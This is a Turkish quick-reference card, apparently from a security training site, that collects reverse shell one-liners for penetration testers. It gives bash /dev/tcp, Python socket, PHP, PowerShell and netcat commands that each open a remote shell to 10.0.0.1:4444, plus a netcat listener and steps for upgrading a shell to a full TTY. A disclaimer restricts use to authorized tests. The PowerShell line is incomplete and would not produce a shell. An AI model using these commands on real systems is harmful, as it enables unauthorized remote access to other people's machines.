~/sibercrew
Hızlı Başvuru Kartları

Reverse Shell: Hızlı Başvuru Kartı

Yetkili sızma testi senaryolarında sık kullanılan reverse shell komutlarının dil bazında özeti.

paylaş:

Bu kart, bir sistemde uzaktan komut çalıştırma (RCE) zafiyeti doğrulandıktan SONRA, yetkili bir test senaryosunda interaktif bir shell elde etmek için kullanılan komutları özetler.

Önce Dinleyiciyi Başlat (Kendi Makinende)

bash
nc -lvnp 4444

Bash

bash
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

Python

python
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"]);'

PHP

php
php -r '$sock=fsockopen("10.0.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

PowerShell (Windows)

powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4444);

Netcat (Eğer Hedefte -e Destekli Sürüm Varsa)

bash
nc -e /bin/sh 10.0.0.1 4444

Shell'i Yükseltme (Upgrade)

İlk elde ettiğin shell genelde "kısıtlı" (tab tamamlama yok, Ctrl+C ile kopuyor). Şunu dene:

bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ardından:
Ctrl+Z
stty raw -echo; fg
Export TERM=xterm

⚠️ Hatırlatma: Bu teknikler SADECE yazılı izin aldığın, yetkili sızma testi ortamlarında kullanılmalı. İzinsiz bir sisteme reverse shell açmak ciddi bir suçtur.

Bu kart, SiberCrew ekibi tarafından hazırlanmış özgün içeriktir.

Yorumlar (0)

Henüz yorum yok, bu makale hakkındaki ilk düşünceyi sen paylaş.

Yorum yapmak için giriş yap.